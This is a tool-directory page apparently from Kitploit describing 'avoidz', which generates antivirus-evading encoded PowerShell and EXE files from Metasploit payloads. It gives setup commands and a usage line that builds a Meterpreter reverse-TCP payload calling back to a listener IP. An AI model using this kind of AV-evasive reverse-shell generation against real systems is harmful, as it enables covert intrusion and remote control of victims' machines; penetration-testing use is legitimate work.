Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
avoidz — Avoidz tool to bypass most A.V softwares | Kitploit
Tools/GitHubGitHub/m4sc3r4n0/avoidz
Exploit FrameworksPayload GenerationIDS/IPS EvasionPenetration TestingLearning & EducationPayload Development
GitHubm4sc3r4n0/avoidz

avoidz

Avoidz tool to bypass most A.V softwares

View Repository
139399 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Avoidz v 1.3

root@kitploit:~
Author: Mascerano Bachir [ dev-labs ]

Legal Disclamer:

root@kitploit:~
The author does not hold any responsibility for the bad use of this tool,
remember this is only for educational purpose.

Description:

root@kitploit:~
This tool Generate encoded powershell with metasploit payloads,convert C, C#, py, go Templates to EXE's 

Screenshot:

pic1

pic2



Dependencies :

root@kitploit:~
1 - metasploit-framework
2 - xterm
3 - MinGW32
4 - Monodevelop
5 - Wine
6 - Python.exe v 2.7
7 - Golang

Download/Config/Usage:

root@kitploit:~
1º - Download the tool from github
     git clone https://github.com/M4sc3r4n0/avoidz.git

2º - Set setup script execution permission
     cd avoidz
     chmod +x setup.sh

3°- Run setup script
     ./setup.sh == to check dependencies

4°- Run avoidz tool == example
 ./avoidz.rb == help command
 ./avoidz.rb -h 192.168.1.3 -p 666 -m windows/meterpreter/reverse_tcp -f c1 == generate

video tutorial:

Avoidz v 1.0 old method : https://www.youtube.com/watch?v=ZilOByKkrVk

Download Tool